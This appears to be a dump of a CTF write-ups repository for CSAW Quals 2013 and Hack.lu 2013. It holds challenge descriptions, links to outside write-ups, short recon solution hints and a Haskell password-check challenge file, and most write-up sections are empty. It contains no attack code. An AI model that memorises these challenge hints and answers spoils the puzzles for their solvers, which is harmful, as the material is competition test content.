1 | # CSAW Quals CTF 2015: Guess Harder
2 |
3 | **Category:** Web
4 | **Points:** 100
5 | **Solves:** 985
6 | **Description:**
7 |
8 | > http://128.238.66.215
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/web/herpderper-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Herpderper
2 |
3 | **Category:** Web
4 | **Points:** 300
5 | **Solves:** 89
6 | **Description:**
7 |
8 | > [herpderper.apk](herpderper.apk)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/web/herpderper-300/herpderper.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/web/herpderper-300/herpderper.apk
--------------------------------------------------------------------------------
/csaw-quals-2013/web/nevernote-200/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Nevernote
2 |
3 | **Category:** Web
4 | **Points:** 200
5 | **Solves:** 307
6 | **Description:**
7 |
8 | > http://128.238.66.214
9 | > from: Nevernote Admin
10 | > to: challenger@ctf.isis.poly.edu
11 | > date: Thurs, Sep 19, 2013 at 3:05 PM
12 | > subject: Help
13 | >
14 | > Friend,
15 | > Evil hackers have taken control of the Nevernote server and locked me out. While I'm working on restoring access, is there anyway you can get in to my account and save a copy of my notes? I know the system is super secure but if anybody can do it - its you.
16 | > Thanks,
17 | > Nevernote Admin
18 |
19 | ## Write-up
20 |
21 | (TODO)
22 |
23 | ## Other write-ups and resources
24 |
25 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/alex-taylor.txt:
--------------------------------------------------------------------------------
1 | Alexander Taylor - 100 Points
2 | Solved by 134 teams.
3 |
4 | Alexander Taylor
5 | https://www.google.com/search?&q=Alexander+Taylor
6 |
7 | 1) Grab photo from judges page
8 | 2) Strings/analyze
9 | 3) Notice unusual chunks
10 | 4) extract bogus ones
11 | 5) xor
12 | 6) ???
13 | 7) profit
14 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/brandon-edwards.txt:
--------------------------------------------------------------------------------
1 | Brandon Edwards - 100 Points
2 | Solved by 425 teams.
3 |
4 | Brandon Edwards
5 | https://www.google.com/search?&q=Brandon+Edwards
6 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/historypeats.txt:
--------------------------------------------------------------------------------
1 | historypeats - 100 Points
2 | Solved by 607 teams.
3 |
4 | historypeats
5 | https://www.google.com/search?&q=historypeats
6 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/jordan-wiens.txt:
--------------------------------------------------------------------------------
1 | Jordan Wiens - 100 Points
2 | Solved by 188 teams.
3 |
4 | http://key.psifertex.com
5 |
6 |
7 | 1) key.psfiertex.com contains: "Michael Vario sure does some suspicious signs, hope he doesn't do me"
8 | 2) Google "Michael Vario", see multiple results about weird PGP key signing he does.
9 | 3) Search jordan wiens on any public keyserver: http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x9FBEBC5EA827D636
10 | 4) 'getting warmer!' in gpg key name
11 |
12 | 5a) search for analyze pgp and follow http://www.macfreek.nl/memory/Analysing_PGP_Identities
13 |
14 | or
15 |
16 | 5b) just import key into thunderbird. notice picture.
17 |
18 | or
19 |
20 | 5c) search/import with gpg, use gpg 'showpicture' function to show image
21 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/julian-cohen.txt:
--------------------------------------------------------------------------------
1 | Julian Cohen - 100 Points
2 | Solved by 258 teams.
3 |
4 | Julian Cohen
5 | https://www.google.com/search?&q=Julian+Cohen
6 |
7 |
8 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/kevin-chung.txt:
--------------------------------------------------------------------------------
1 | Kevin Chung - 100 Points
2 | Solved by 292 teams.
3 |
4 | Kevin Chung
5 | https://www.google.com/search?&q=Kevin+Chung
6 |
7 | 1) add 'security' or 'poly' to kevin's search:
8 | 2) find codekevin.com
9 | 3) shows hint that no key there, but references 'graduation'
10 | 4) https://www.google.com/search?&q=Kevin+Chung+high+school
11 | 5) Page 3 finds: https://hsf.isis.poly.edu/previous_winners
12 | 6) Which points to: https://hsf.isis.poly.edu/assets/uploads/pages/previous_winners/key.txt
13 |
14 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/odin.txt:
--------------------------------------------------------------------------------
1 | Odin - 100 Points
2 | Solved by 165 teams.
3 |
4 | Odin
5 | https://www.google.com/search?&q=Odin
6 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/theodore-reed.txt:
--------------------------------------------------------------------------------
1 | Theodore Reed - 100 Points
2 | Solved by 115 teams.
3 |
4 | http://prosauce.org
5 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/widgetcorp-400/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: WidgetCorp
2 |
3 | **Category:** Web
4 | **Points:** 400
5 | **Solves:** 99
6 | **Description:**
7 |
8 | > http://128.238.66.224
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013 write-ups
2 |
3 | *
4 | * [Scoreboard](https://ctf.fluxfingers.net/2013/scoreboard)
5 |
6 | ## Completed write-ups
7 |
8 | * none yet
9 |
10 | ## External write-ups only
11 |
12 | * [Beer Pump Filtration](misc/Beer-Pump-Filtration)
13 | * [BREW'r'Y](crypto/BREW-r-Y)
14 | * [ECKA](crypto/ECKA)
15 | * [ELF](reversing/ELF)
16 | * [FluxArchiv (Part 1)](reversing/FluxArchiv-Part1)
17 | * [FluxArchiv (Part 2)](reversing/FluxArchiv-Part2)
18 | * [Geier's Lambda](crypto/Geier-s-Lambda)
19 | * [Geolocation Flag](misc/Geolocation-Flag)
20 | * [Marvin is plain-Jane](crypto/Marvin-is-plain-Jane)
21 | * [Packed](internals/Packed)
22 | * [Pay TV](web/Pay-TV)
23 | * [RoboAuth](reversing/RoboAuth)
24 | * [Roboparty](misc/Roboparty)
25 | * [Robot Plans](internals/Robot-Plans)
26 | * [Robotic Superiority](exploiting/Robotic-Superiority)
27 | * [Robots Exclusion Committee](web/Robots-Exclusion-Committee)
28 | * [Wannabe](exploiting/Wannabe)
29 | * [What's wrong with this?](internals/What-s-wrong-with-this)
30 |
31 | ## Missing write-ups
32 |
33 | * [Breznparadisebugmaschine](exploiting/Breznparadisebugmaschine)
34 | * [For whom the bell tolls](misc/For-whom-the-bell-tolls)
35 | * [OTP](misc/OTP)
36 |
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/BREW-r-Y/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: BREW'r'Y
2 |
3 | **Category:** Crypto
4 | **Points:** 350
5 | **Author:** dwuid
6 | **Description:**
7 |
8 | > Finally, the robots managed to sneak into one of our breweries. I guess I won't have to explain how bad that really is. That darn non-physical ones even shutdown our login system. Shiny thing, advanced technology, all based on fingerprints. Been secure as hell. If only it was running. Well, basically, we're screwed.
9 | > But wait, there's hope. Seems like they didn't shutdown our old login system. Backward compatibility's a bitch, eh? Unfortunately, we got like _zero_ knowledge about the protocol. I mean come on, the last time we used that thingy was like decades ago. If we are lucky, the old authentication method is buggy.
10 | > So, I heard you're kinda smart? Have a look at it. We desperately need to get drunk^W supply. You'll find the old system at ctf.fluxfingers.net:1335. Good luck.
11 | >
12 | > Hint: Data is - and is expected to be - compressed using zlib.
13 | > Hint: The challenge text gives hints about the protocol involved. We updated it in order to reflect that fact.
14 |
15 | ## Write-up
16 |
17 | None
18 |
19 | ## Other write-ups and resources
20 |
21 | [More Smoked Leet Chicken](http://mslc.ctf.su/wp/hack-lu-2013-ctf-crypto-350-brewry)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/ECKA/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: ECKA
2 |
3 | **Category:** Crypto
4 | **Points:** 100
5 | **Author:** asante
6 | **Description:**
7 |
8 | > Hey you!
9 | > Come over and help me, please. We discovered a strange key agreement protocol used on this server: ctf.fluxfingers.net:1330.
10 | > They send a curve which they use later. But we think the robots are a bit UBER-cautious and do not use the curve's P. So they first exchange their public point with a technique we could not figure out. It looks like they do not need a public key for this step.
11 | > Afterwards they use another technique to agree on a key which they ultimately use to send some encrypted password.
12 | >
13 | > We need this last password to shut down the robo-factory on our way to the Oktoberfest.
14 | >
15 | > Oh btw, the robots use AES-ECB for symmetric encryption.
16 | >
17 | > Hint: He, we have the latest news for you. The first part of their strange key agreement was designed by the famous SHA-Robot Мир!
18 | > For all robo hunters out there: Your quest-description was updated - check it!
19 |
20 | ## Write-up
21 |
22 | None
23 |
24 | ## Other write-ups and resources
25 |
26 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-ecka](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-ecka)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/Geier-s-Lambda/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Geier's Lambda
2 |
3 | **Category:** Crypto
4 | **Points:** 200
5 | **Author:** asante
6 | **Description:**
7 |
8 | > Hey!
9 | > We need your help. Our agent found some details about a huge conspiracy. Looks like they wanna plant a bomb near the Oktoberfest's main fairground ride. But we have a good chance, to get the defusing-password. That's where you have to jump in. We managed to steal the encrypted password along with a decryption file. Our agent also started to work on it, but one of the robots caught him and now we are left-behind with his infos.
10 | >
11 | > He found a collision on the real password but wasn't sure, if he can use that one. But, here is it: “Le1sRI6I” - perhaps you have better luck. He also found out, that the robots only use alphanumeric characters and that the collision is of the same length, than the real password. The last thing he told us is, that the defusing password must contain only printable characters.
12 | >
13 | > Hope that helps you! And now hurry!
14 | >
15 | > Here is your challenge: [pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs](pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs)
16 |
17 | ## Write-up
18 |
19 | None
20 |
21 | ## Other write-ups and resources
22 |
23 | * [http://balidani.blogspot.pt/2013/10/hacklu-ctf-crypto-200-geiers-lambda.html](http://balidani.blogspot.pt/2013/10/hacklu-ctf-crypto-200-geiers-lambda.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/Geier-s-Lambda/pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs:
--------------------------------------------------------------------------------
1 | #!/usr/bin/runhaskell
2 | {-# LANGUAGE NoMonomorphismRestriction #-}
3 |
4 | import Data.Bits
5 | import Data.Char
6 | import Data.Word
7 | import System.Environment
8 | import Numeric
9 |
10 | -- known Collision: "Le1sRI6I"
11 |
12 | flag = 0xce97a7b6d709fb62
13 |
14 | main = p =<< getArgs
15 | where p (pwd:_) = print $ dec flag $ toKey pwd
16 | p _ = return ()
17 |
18 | hash :: String -> Word32
19 | hash = fromIntegral.(\(a,b)->(b`shift`16).|.a).foldl r (1, 0)
20 | where r = \(a,b) x->(a+(ord x.&.0xff),(a+(ord x.&.0xff)+b))
21 |
22 | dec :: Word64 -> Word32 -> Word64
23 | dec v k = fin $ foldl r (3337565984,v0,v1) [0..31] where
24 | v0 = fromIntegral v :: Word32
25 | v1 = fromIntegral $ v `shiftR` 32 :: Word32
26 | s' = \a->a-d
27 | r = \(s,x,y) _-> let y' = update y x s k (-)
28 | x' = update x y' s k (-)
29 | in (s' s, x', y')
30 |
31 | update = \a b c d f->f a (((b`shift`4) + d)`xor`(b+c)`xor`((b`shiftR`5) + d))
32 | fin = \(_,x,y)->fromIntegral y`shiftL`32.|.(fromIntegral x.&.0xffffffff)
33 |
34 | toHexStr s = concat $ "0x":map (flip showHex "".ord) s
35 | toKey s = k0 where
36 | s' = toHexStr s
37 | k0 = read ("0x"++(take 8$drop 2 s')) :: Word32
38 |
39 |
40 | d = 2654435769
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/Marvin-is-plain-Jane/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Marvin is plain-Jane
2 |
3 | **Category:** Crypto
4 | **Points:** 100
5 | **Author:** asante
6 | **Description:**
7 |
8 | > Hey mister super-duper robo-dabster. We need you to tell us, what Marvin is!
9 | >
10 | > What we know:
11 | >
12 | > Marvin is
13 | > using brainpool p256r1.
14 | > His friend is called meneze or something. Or was it van-stone?
15 | >
16 | > What we heard:
17 | >
18 | > (23372093078317551665216159139784413411806753229249201681647388827754827452856 : 1)
19 | > 71164450240897430648972143714791734771985061339722673162401654668605658194656
20 | > 12951693517100633909800921421096074083332346613461419370069191654560064909824
21 | > What we need to know:
22 | >
23 | > What Marvin is
24 |
25 | ## Write-up
26 |
27 | None
28 |
29 | ## Other write-ups and resources
30 |
31 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-marvin-is-plain-jane](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-marvin-is-plain-jane)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Breznparadisebugmaschine
2 |
3 | **Category:** Exploiting
4 | **Points:** 500
5 | **Author:** martin, flandy
6 | **Description:**
7 |
8 | > The robot forces modified our beloved Breznparadisebackmaschine. This machine stores our secret, traditional Brezn recipe. Yet, we forgot the last secret ingredient and cannot access the Breznparadisebackmaschine anymore. However, Brezn are crucial for our party, as only paradise Brezn provide us the nice and warm feeling in our guts.
9 | >
10 | > We need you to recover the important ingredient! Here is everything we could remember from the recipe:
11 | >
12 | > For The Dough
13 | > 1 kg Plain White Flour (around 9 - 12 % protein)
14 | > 260 ml milk (lukewarm)
15 | > 260 ml water (lukewarm)
16 | > 80 g Butter (unsalted)
17 | > 1 tbsp malt extract (liquid or dried, or brown sugar)
18 | > 2 tsp fast action dried yeast (or 42g fresh if using)
19 | > 2 tbsp Salt (unrefined)
20 | > For The Finishing Solution
21 | > 1 L Water
22 | > 3 tbsp Baking Soda (or lye if your using it)
23 | > Secret Ingredient
24 | >
25 | > Please, we need to know that ingredient to make everyone happy again!
26 | [Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe](Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe)
27 | > ctf.fluxfingers.net:1340
28 | > Brezelparadisebackmaschinefirmware: Windows 2012
29 | >
30 | > Announcements:
31 | > Ah, perhaps it helps you to know, that our Breznparadisebugmaschinefirmware is up to date with Windows 2012.
32 |
33 | ## Write-up
34 |
35 | None
36 |
37 | ## Other write-ups and resources
38 |
39 | None
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Robotic-Superiority/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Robotic Superiority
2 |
3 | **Category:** Exploiting
4 | **Points:** 250
5 | **Author:** lama
6 | **Description:**
7 |
8 | > Help us fight the evil robotic lieutenant Don Sim. He wants to spread robo propaganda to cover his actions on the Oktoberfest. But he needs good video footage for that. So he created an IRC bot that collects information about robots in movies. Robotic emancipation can NOT happen, you have to stop him! All we need is his private key. Our agents located the bot, here is all we know about it:
9 | >
10 | > Server: irc://ctf.fluxfingers.net:1313
11 | > Bot: lib[1-5] (load balancer)
12 | > Key: /var/private/key.txt
13 | >
14 | > Hint: All available commands are listed with "help". 3 connections allowed per ip.
15 |
16 | ## Write-up
17 |
18 | None
19 |
20 | ## Other write-ups and resources
21 |
22 | * [http://secgroup.ext.dsi.unive.it/2013/10/25/hack-lu-2013-ctf-write-up-robotic-superiority](http://secgroup.ext.dsi.unive.it/2013/10/25/hack-lu-2013-ctf-write-up-robotic-superiority)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Wannabe/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Wannabe
2 |
3 | **Category:** Exploiting
4 | **Points:** 400
5 | **Author:** r1cky
6 | **Description:**
7 |
8 | > One of our informants met a guy who calls himself Elite Arthur, he is a real jackass, and he thinks he is the best hacker alive. We got reason to believe that the robots hired him to write the firmwares for their weapons. But to write such a firmware we need the key to sign the code. Luckily for us, our informant also found his website: …. your job is to hack the server, find the flag and show this little cocksucker how skilled he really is. We count on you.
9 | > Here is your challenge: https://ctf.fluxfingers.net:1317. Alternatively, you can reach the challenge without a reverse proxy but also without SSL here: http://ctf.fluxfingers.net:1339
10 | >
11 | > Announcement: Okay you can stop struggling now: XSS is not the way; leave the http cookie alone; get RIP to do the final trick!
12 |
13 | ## Write-up
14 |
15 | None
16 |
17 | ## Other write-ups and resources
18 |
19 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-wannabe](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-wannabe)
20 | * [https://www.arneswinnen.net/2013/11/hack-lu-2013-ctf-wannabe-writeup-part-one-web-exploitation](https://www.arneswinnen.net/2013/11/hack-lu-2013-ctf-wannabe-writeup-part-one-web-exploitation)
21 |
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/Packed/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Packed
2 |
3 | **Category:** Internals
4 | **Points:** 200
5 | **Author:** freddyb
6 | **Description:**
7 |
8 | > We just found a dead robot. It seems there is some useful data left but somehow it got confused with other data and now we don't know what's useful and what's junk. We just know there is only one way to go but there are many dead ends.
9 | > Here is the challenge: [packed_7245b354be136111061c9a118d6304598f46c767](packed_7245b354be136111061c9a118d6304598f46c767)
10 | >
11 | > Announcements:
12 | > Think outside the box - being several types at once like an animal that can change its color. Excuse the inaccuracy, but that's what you're searching for.
13 |
14 | ## Write-up
15 |
16 | None
17 |
18 | ## Other write-ups and resources
19 |
20 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-internals-200-packed-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-internals-200-packed-write-up)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/Robot-Plans/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Robot Plans
2 |
3 | **Category:** Internals
4 | **Points:** 150
5 | **Author:** DrunkenPanda
6 | **Description:**
7 |
8 | > We have captured a robot from behind, while he dropped some cooling liquid into the bushes. We tried to interrogate the robot, but he still refuses to speak. Luckily we could extract files from the android's communication module. Hopefully we get some information about the robots' motives, before every information is swiped away...
9 | > Here is the challenge: [https://ctf.fluxfingers.net/static/downloads/max_404/image.tar.gz](https://ctf.fluxfingers.net/static/downloads/max_404/image.tar.gz)
10 |
11 | ## Write-up
12 |
13 | None
14 |
15 | ## Other write-ups and resources
16 |
17 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-robot-plans](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-robot-plans)
18 | * [https://thufirhowatt.wordpress.com/hack-lu-ctf-robot-plans-writeup](https://thufirhowatt.wordpress.com/hack-lu-ctf-robot-plans-writeup)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/What-s-wrong-with-this/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: What's wrong with this?
2 |
3 | **Category:** Internals
4 | **Points:** 250
5 | **Author:** javex
6 | **Description:**
7 |
8 | > We managed to get this package of the robots servers. We managed to determine that it is some kind of compiled bytecode. But something is wrong with it. Our usual analysis failed - so we have to hand this over to you pros. We only know this: The program takes one parameter and it responds with "Yup" if you have found the secret code, with "Nope" else. We expect it should be obvious how to execute it.
9 | > Here is the challenge: [hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz](hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz)
10 |
11 | ## Write-up
12 |
13 | None
14 |
15 | ## Other write-ups and resources
16 |
17 | * [http://secgroup.ext.dsi.unive.it/2013/10/27/hack-lu-2013-ctf-write-up-whats-wrong-with-this](http://secgroup.ext.dsi.unive.it/2013/10/27/hack-lu-2013-ctf-write-up-whats-wrong-with-this)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/What-s-wrong-with-this/hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/internals/What-s-wrong-with-this/hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Beer-Pump-Filtration/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Beer Pump Filtration
2 |
3 | **Category:** Misc
4 | **Points:** evaluated
5 | **Author:** FluxFingers
6 | **Description:**
7 |
8 | > Our agents observed that the famous robot Bender is part of the robot forces. Somehow he looked pregnant but his big belly is now gone. We fear that they might have smuggled some of Benders freshly brewed BenderBräu into our beer supplies. This is why we need brave women and men to test whether BenderBräu can cause severe damage on the human body or not, to avoid poisoning the whole party. But you have to test quick! Everyone is thirsty!
9 | >
10 | > For testing you need to drink 0.5 liter of beer, preferably wheat beer, as fast as you can.
11 | >
12 | > Make a video of your brave tasting and hand it in. The video must contain a proof of the current date. Show to us the totally secure and random Nonce "17" as well as your teamname written on... something. Also show us the closed beer bottle before, the empty after the tasting, and prove that it is 0.5 liters.
13 | >
14 | > We will judge the score as follows:
15 | >
16 | > Score = 100 Points - Seconds it takes to drink the beer
17 | >
18 | > Bonuspoints for:
19 | > Girls (Due to the law for gender equality we score women higher for the same effort)
20 | > Dressing up like a robot or an Oktoberfest maid in her Dirndl
21 | > Robo Dance
22 | > Drinking Weizenbier (wheat beer)
23 |
24 | ## Write-up
25 |
26 | None
27 |
28 | ## Other write-ups and resources
29 |
30 | * [PPP](https://www.youtube.com/watch?v=Y473nQphv8Y)
31 | * [BalalaikaCr3w](https://www.youtube.com/watch?v=Cl0dp4eL7qg)
32 | * [Stratumauhuur](https://www.youtube.com/watch?v=hHoFBd5lpYY)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: For whom the bell tolls
2 |
3 | **Category:** Misc
4 | **Points:** 250
5 | **Author:** Til
6 | **Description:**
7 |
8 | > To be frank, the impact partying robots had on the Oktoberfest in the recent years was disastrous. While the authorities have been able to downplay all recent incidents in the press (which habitually tends to blame visitors from the U.S., Australia, Cologne, and other places, where proper beer can only be found by the initiated), they can no longer deny the problem. Several public safety and law enforcement agencies have joined forces to spoil the robot's fun. They have planned a massive crackdown on our fun-seeking robotic friends. Time and location are currently being communicated together with a passphrase. Our organization, Robots on Rampage (RoR), is determined to stop them from stopping our annual beer-tasting event.
9 | > A robot agent on location in Munich has dectected a transmission between timestamp 2013-10-19-20:21:42 and 2013-10-19-20:21:43. The precise beginning of the transmission is unknown. The agent was unable to decrypt the message content. Being not the smartest agent, he also disposed of the message capture. In the following we were able to determine the sender location and the Forensic Analysis Robot Team (FART) was able to retrieve the session key and a initialization vector (IV). Judging from the memory fragments FART found, our best guess is that OpenSSL's AES implementation was used in one of the better modes to encrypt the communication. As the session key length is 128bit, the long term key is most probably longer. Due to time constraints we strongly advise against trying to break it. We have less confidence in the humans' ability to design proper communication protocols and services, though. However, we need a human to attack their logic.
10 | >
11 | > We have no way to actively communicate with the server the use for coordination. However, we can give you access to one of the lawful interception wiretaps those humans build into all their equipment. A TCP connection to ctf.fluxfingers.net:1334 will give you a maximum of 60 seconds of traffic. We have also found active equipment of a human agent we can interact with. He seems to listen on ctf.fluxfingers.net:1333, but we have no idea what he does with the input, except that there is encrypted traffic.
12 | >
13 | > Update:
14 | > Sessionkey and IV can be downloaded here [bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2](bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2)
15 | >
16 | > Announcements
17 | >
18 | > Ruby Version 1.8.7
19 | >
20 | > New Hints appeard!
21 | > RoR has determined that the human agents acts as a proxy and requests meeting place, time and password for others. We think the first message he sends serves to agree on a session key for the answer. RoR analysts have also been staring at pcaps a lot lately. We think that on port 1832 (which we can only monitor passively) we are observing a key establishment that follows the simple ISO/IEC 11770-2 Mechanism 1. However, on tcp/1333 our analysts say that marshalled Ruby DateTime objects are flying by. Not sure, why anyone would do this, but given what we see on the other port, it makes sense (in a twisted way).
22 |
23 | ## Write-up
24 |
25 | None
26 |
27 | ## Other write-ups and resources
28 |
29 | None
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Geolocation-Flag/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Geolocation Flag
2 |
3 | **Category:** Misc
4 | **Points:** -
5 | **Author:** javex
6 | **Description:**
7 |
8 | > https://ctf.fluxfingers.net/2013/challenges/24
9 | > This challenge is a special challenge. You can collect some minor extra points here by proving that you are a truly international player. Each time you visit your reference URL from a different country, that flag will be activated and you gain an additional point. You already have 0/222 points.
10 | > This challenge cannot be solved in archive mode.
11 | > Disclaimer: Please do not attempt to hack real-world systems for a single point. That is illegal and we assure you it is not worth a single point!
12 |
13 | ## Write-up
14 |
15 | None
16 |
17 | ## Other write-ups and resources
18 |
19 | * [http://thehackerblog.com/sneaky-methods-for-capturing-the-geolocation-flags-for-hack-lu-ctf](http://thehackerblog.com/sneaky-methods-for-capturing-the-geolocation-flags-for-hack-lu-ctf)
20 | * [http://blog.0ops.net/blog/2013/10/27/hack-dot-lu-ctf-2013-misc-222-geolocation-flag](http://blog.0ops.net/blog/2013/10/27/hack-dot-lu-ctf-2013-misc-222-geolocation-flag)
21 | * [http://nikaiw.io/scanning-the-internet-for-fun-and-country-flags-hack-lu](http://nikaiw.io/scanning-the-internet-for-fun-and-country-flags-hack-lu)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/OTP/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: OTP
2 |
3 | **Category:** Misc
4 | **Points:** 200
5 | **Author:** SLAZ
6 | **Description:**
7 |
8 | > Some robots are on the Oktoberfest and want to take some tasty oil in a tent. But they hadn't reserved a table and all tents are full. No one gets access. They found a back entrance and managed to spy the credentials while an employee enters. They captured the username “admin” and password “supersafepw”. But the employee also entered a strange number (168335). As they were sure nobody's looking, they tried the captured data to get in the tent, but it didn't work. Help the robots to get their tasty tasty oil. (Or they have to build their own tent with blackjack and hookers)
9 | > Here is your challenge: https://ctf.fluxfingers.net:1318
10 |
11 | ## Write-up
12 |
13 | None
14 |
15 | ## Other write-ups and resources
16 |
17 | None
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Roboparty/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Roboparty
2 |
3 | **Category:** Misc
4 | **Points:** 300
5 | **Author:** audioPhil
6 | **Description:**
7 |
8 | > Robot LHCH is happy. He made it into the castings for the tenth roman musical. He even is so happy that he went on the Oktoberfest to drink some beer. Unfortunately it seems that he drank too much so now he is throwing up part of his source code. Can you decipher the secret he knows?
9 | > Warning: Viewing this page is not recommended for people that suffer from epilepsy. We are dead serious.
10 | > And here is your totally eye-friendly challenge: https://ctf.fluxfingers.net/static/downloads/roboparty/index.html
11 | >
12 | > Hints:
13 | > The flag starts with 'Y4Y,'
14 | > It's neither Velato nor Fugue.
15 |
16 | ## Write-up
17 |
18 | None
19 |
20 | ## Other write-ups and resources
21 |
22 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-roboparty](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-roboparty)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/ELF/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: ELF
2 |
3 | **Category:** Reversing
4 | **Points:** 400
5 | **Author:** sqall
6 | **Description:**
7 |
8 | > We encountered a drunk human which had this binary file in his possession. We do not really understand the calculation which the algorithm does. And that is the problem. Can you imagine the disgrace we have to suffer, when we robots, based on logic, can not understand an algorithm? Somehow it seems that the algorithm imitates their masters and behaves …. drunk! So let us not suffer this disgrace and reverse the algorithm and get the correct solution.
9 | > Here is your challenge: [reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308](reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308)
10 | >
11 | > Announcements:
